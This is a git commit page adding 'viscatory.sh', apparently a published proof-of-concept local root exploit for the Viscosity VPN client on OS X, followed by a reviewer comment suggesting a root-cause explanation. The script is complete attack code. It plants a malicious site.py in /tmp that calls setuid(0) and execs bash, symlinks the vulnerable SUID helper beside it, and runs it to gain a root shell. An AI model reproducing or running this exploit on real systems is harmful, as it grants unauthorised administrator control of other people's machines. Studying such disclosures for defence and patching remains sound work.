authorJason A. Donenfeld <Jason@zx2c4.com>2012-08-13 05:51:52 +0200
committerJason A. Donenfeld <Jason@zx2c4.com>2012-08-13 06:00:11 +0200
commit0d36d2ec75f3098a3a250d84dc38962f0aedfeb6 (patch)
tree4c04426c47320b3c97404dc5fa4e9e706361a9d0 /viscatory.sh
Initial commit of easy local root.
Diffstat (limited to 'viscatory.sh')
-rwxr-xr-xviscatory.sh32
1 files changed, 32 insertions, 0 deletions
diff --git a/viscatory.sh b/viscatory.sh
new file mode 100755
index 0000000..4f323b3
--- /dev/null
+++ b/viscatory.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+#
+##########################
+# Viscatory #
+# #
+# zx2c4 #
+##########################
+#
+# After the hullabaloo from the Tunnelblick local root, savy Mac users
+# began defending Viscosity, another OS X VPN client. They figured, since
+# they spent money on Viscosity, surely it would be better designed than
+# the free alternative.
+#
+# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
+# the win. Here, the SUID helper will execute site.py in its enclosing
+# folder. A simple symlink, and we have root.
+
+echo "[+] Crafting payload."
+mkdir -p -v /tmp/pwn
+cat > /tmp/pwn/site.py <<_EOF
+import os
+print "[+] Cleaning up."
+os.system("rm -rvf /tmp/pwn")
+print "[+] Getting root."
+os.setuid(0)
+os.setgid(0)
+os.execl("/bin/bash", "bash")
+_EOF
+echo "[+] Making symlink."
+ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
+echo "[+] Running vulnerable SUID helper."
+exec /tmp/pwn/root
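Review bot: The header comment block at the top of the hunk describes the trigger but never states the root cause or where the fix belongs, which is what a reader of this record needs most. I would extend the comment after "A simple symlink, and we have root." with `# Root cause: the SUID helper appears to resolve site.py relative to the path it was invoked through (here a symlink an unprivileged user controls) rather than a fixed, root-owned directory; the fix belongs in the helper (resolve its real location before importing, or drop the SUID bit).` The comment should also record the affected Viscosity version and the vendor report date, neither of which is on this page; use `<affected-version>` and `<report-date>` placeholders until they are known.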